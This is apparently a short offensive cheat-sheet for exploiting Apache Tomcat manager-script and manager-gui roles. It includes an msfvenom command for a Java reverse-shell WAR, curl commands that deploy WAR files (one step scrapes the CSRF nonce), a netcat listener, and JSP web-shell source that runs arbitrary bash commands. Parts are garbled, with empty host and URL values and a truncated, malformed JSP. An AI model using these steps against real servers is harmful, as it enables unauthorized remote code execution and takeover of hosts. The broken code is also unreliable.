Manager-script Role

Steps to exploit the Apache Tomcat manager-script role

Generate WAR reverse shell:
msfvenom -p java/shell_reverse_tcp lhost= lport=4444 -f war -o reverse.war
Then deploy the WAR file to the target’s tomcat service with manager access
(V6 and under use /manager/deploy path instead of /manager/text/deploy)
curl -v -u user:'password' -T 'reverse.war' ''
Start your netcat listener:
nc -lvp 4444
Call war application to trigger reverse shell execution and initiate the connection:

Manager-gui Role

Sometimes only the GUI role is enabled for administration,
and you don’t have direct access to it because of network limitation of tomcat or host.
# Load web page to retrieve cookies to cookies file and CSRF token
CSRF=$(curl -sS "http://user:password@localhost:8080/manager/html" -b cookies -c cookies | grep jsession | tail -n1 | sed 's#.*CSRF_NONCE=\([^\"]*\).*#\1#')

# Deploy war
curl -v -b cookies -c cookies -F "deployWar=@pwn.war" "http://user:password@localhost:8080/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=$CSRF"

WAR/JSP Creation

Create index.jsp file
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
<%@ page import="*" %>
   String cmd = request.getParameter("cmd");
   String[] args = {"/bin/bash", "-c", cmd}
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(args);
         BufferedReader sI = new BufferedReader(new
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
<pre><%=output %></pre>
Create war
mkdir pwn/ && cp index.jsp pwn/ && cd pwn/
jar -cvf ../pwn.war * && cd ../